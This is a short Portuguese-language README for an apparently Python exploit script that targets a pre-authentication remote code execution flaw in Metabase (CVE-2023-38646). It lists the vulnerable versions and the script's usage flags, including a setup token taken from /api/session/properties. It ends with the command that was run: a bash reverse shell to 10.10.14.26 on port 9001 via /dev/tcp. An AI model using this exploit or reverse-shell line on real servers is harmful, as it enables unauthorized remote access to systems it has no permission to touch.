
Script de exploit para RCE pré-autenticação no Metabase (CVE-2023-38646)
Este é um script em Python que explora a vulnerabilidade de execução remota de código do software de login do Metabase. Permite executar comandos arbitrários no servidor antes da autenticação.
As versões vulneráveis são Metabase open source anteriores a 0.46.6.1 e Metabase Enterprise anteriores a 1.46.6.1
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help show this help message and exit
-u URL, --url URL Target URL
-t TOKEN, --token TOKEN
Setup-Token found in /api/session/properties
-c COMMAND, --command COMMAND
Command to be executed in the target host

Comando utilizado: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1